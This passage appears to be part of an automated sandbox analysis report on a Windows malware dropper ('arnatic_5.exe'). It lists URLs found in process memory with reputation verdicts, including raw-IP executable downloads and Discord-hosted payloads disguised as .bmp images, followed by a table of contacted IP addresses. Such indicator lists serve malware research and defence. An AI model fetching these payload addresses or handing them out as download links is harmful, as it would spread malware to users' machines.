https://cdn.discordapp.com:80/attachments/910842184708792331/931494519592075284/27f_1401.bmpbe	arnatic_5.exe, 00000013.00000003.409993066.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393463301.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427086754.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456992136.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422737689.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432338816.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432737345.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443820817.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443352919.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427534412.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417510636.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404358539.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480687537.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422178546.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489805744.00000000064E2000.00000004.00000001.sdmp	false		high
https://ipgeolocation.io/Content-Type:	0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp, arnatic_5.exe, 00000013.00000000.302483192.0000000000EBB000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://45.144.225.57/EU/searchEUunlim.exeC:	arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://curl.se/V	0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.291491317.0000000002B50000.00000004.00000001.sdmp, setup_install.exe, 00000007.00000002.304636347.000000006B4CC000.00000040.00020000.sdmp	false	URL Reputation: safe	unknown
http://45.144.225.57/WW/search_target1kpd.exean	arnatic_5.exe, 00000013.00000003.391048564.00000000064F9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386881565.00000000064F9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389372557.00000000064F9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379483233.00000000064F9000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com:80/attachments/910842184708792331/928293476800532500/utube0501.bmpQb	arnatic_5.exe, 00000013.00000003.409993066.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393463301.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427086754.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456992136.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422737689.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432338816.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432737345.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443820817.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443352919.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427534412.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417510636.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404358539.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480687537.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422178546.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489805744.00000000064E2000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpC:	arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	false		high
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exeI	arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	arnatic_5.exe, 00000013.00000003.402660540.0000000007C48000.00000004.00000001.sdmp	false		high
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exeJ	arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://s.lletlee.com/tmp/aaa_v002.dllxxxxxxxxxxxxxxxxxxxH	0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287987071.0000000002503000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://212.193.30.45/WW/file9.exemZ	arnatic_5.exe, 00000013.00000003.366115286.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmpa	arnatic_5.exe, 00000013.00000003.451469784.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429864201.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441257967.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432262657.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427009899.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428067710.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435620835.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433191051.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445072716.00000000064C0000.00000004.00000001.sdmp	false		high
http://212.193.30.45/WW/file9.exe0	arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/910842184708792331/931269844253442058/LeGXxX6.bmpC:	arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	false		high
https://iplis.ru/	arnatic_5.exe, 00000013.00000002.487746825.0000000000B66000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/	arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456885585.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/930749897811062804/help1201.bmp331/o	arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488951397.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp	false		high
http://212.193.30.45/WW/file9.exe	arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366115286.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487746825.0000000000B66000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/910842184708792331/931152760785760336/stalkar_4mo.bmpmpH	arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406082315.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489168410.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426514646.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435125355.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.416417846.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426562167.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406761614.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.438103128.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421539113.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	false		high
http://212.193.30.29/WW/file2.exeC:	arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487746825.0000000000B66000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exe	arnatic_5.exe, 00000013.00000003.379380319.00000000064DA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/910842184708792331/928293476800532500/utube0501.bmpmp	arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406082315.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489168410.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426514646.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435125355.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.416417846.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426562167.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406761614.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.438103128.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421539113.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/931210851506065438/new_v11.bmp$	arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/930749897811062804/help1201.bmpC:	arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/931469914336821298/softer1401.bmpC:	arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/931475805228371968/1234_1401.bmpJ	arnatic_5.exe, 00000013.00000002.489168410.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp	false		high
http://212.193.30.29/WW/file4.exe	arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com:80/attachments/910842184708792331/930849718240698368/Roll.bmp	arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	false		high
http://motiwa.xyz/	setup_install.exe, 00000007.00000003.296106978.0000000002710000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/910842184708792331/931469914336821298/softer1401.bmpB8A2D94-0	arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	false		high
https://watertecindia.com/watertec/f.exe	arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://45.144.225.57/WW/sfx_123_310.exeW	arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com:80/attachments/910842184708792331/931474583054352464/newt.bmpe	arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	false		high
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exeC:	arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://212.193.30.45/WW/file9.exeF	arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/910842184708792331/931475805228371968/1234_1401.bmp5	arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	false		high
http://stylesheet.faseaegasdfase.com/hp8/g1/rtst1053.exeC:	arnatic_5.exe, 00000013.00000003.481529607.0000000003EB1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488635760.0000000003EB0000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmpHQ;	arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
85.209.157.230	unknown	Netherlands	18978	ENZUINC-US	false
176.111.174.254	unknown	Russian Federation	201305	WILWAWPL	false
172.67.177.36	unknown	United States	13335	CLOUDFLARENETUS	false
212.193.30.45	unknown	Russian Federation	57844	SPD-NETTR	false
212.193.30.29	unknown	Russian Federation	57844	SPD-NETTR	false
2.56.59.245	unknown	Netherlands	395800	GBTCLOUDUS	false
136.144.41.201	unknown	Netherlands	49981	WORLDSTREAMNL	false
104.21.5.208	unknown	United States	13335	CLOUDFLARENETUS	false
8.8.8.8	unknown	United States	15169	GOOGLEUS	false
91.224.22.193	unknown	Russian Federation	197695	AS-REGRU	false
104.21.12.59	unknown	United States	13335	CLOUDFLARENETUS	false
148.251.234.83	unknown	Germany	24940	HETZNER-ASDE	false
162.159.129.233	unknown	United States	13335	CLOUDFLARENETUS	false
52.218.105.35	unknown	United States	16509	AMAZON-02US	false
